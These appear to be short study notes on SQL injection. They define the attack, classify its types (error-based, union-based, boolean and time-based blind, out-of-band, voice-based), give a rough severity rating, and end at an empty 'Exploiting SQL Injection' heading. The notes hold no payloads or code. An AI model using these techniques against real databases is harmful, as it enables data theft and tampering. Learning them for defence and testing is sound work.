What is SQL Injection?

CSQL Injection ⇒ Allows attacker ⇒ to view `data` ⇒ that attacker normally not able to retrieve ⇒ But using SQLi we now able to retrieve data `Data` ⇒ Information about Users and their passwords etc Attacker can ⇒ modify or delete this data ⇒ causing persistent changes to the application's content or behavior. Attacker can ⇒ escalate an SQL injection attack to compromise the underlying server (or) other back-end infrastructure, or perform a denial-of-service attack

How does SQL Injection Works?

To make an SQL Injection attack, an attacker must first find vulnerable user inputs within the web page or web application. A web page or web application that has an SQL Injection vulnerability uses such user input directly in an SQL query. The attacker can create input content. Such content is often called a malicious payload and is the key part of the attack. After the attacker sends this content, malicious SQL commands are executed in the database.

Types of SQL Injection

• In-band SQLi (Classic SQLi) : In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results.
  • Error-based SQLi : Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database.
  • Union-based SQLi : Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.
• Inferential SQLi (Blind SQLi) : In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band.
  • Boolean-based (content-based) Blind SQLi : Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.
  • Time-based Blind SQLi : Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding.
• Out-of-band SQLi: Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.
• Voice Based Sql Injection:It is a sql injection attack method that can be applied in applications that provide access to databases with voice command. An attacker could pull information from the database by sending sql queries with sound.

Severity

SQL injection can be categorized as P1 or P2 bug with a CVSS score of 7.5 - 9 which is High.

Exploiting SQL Injection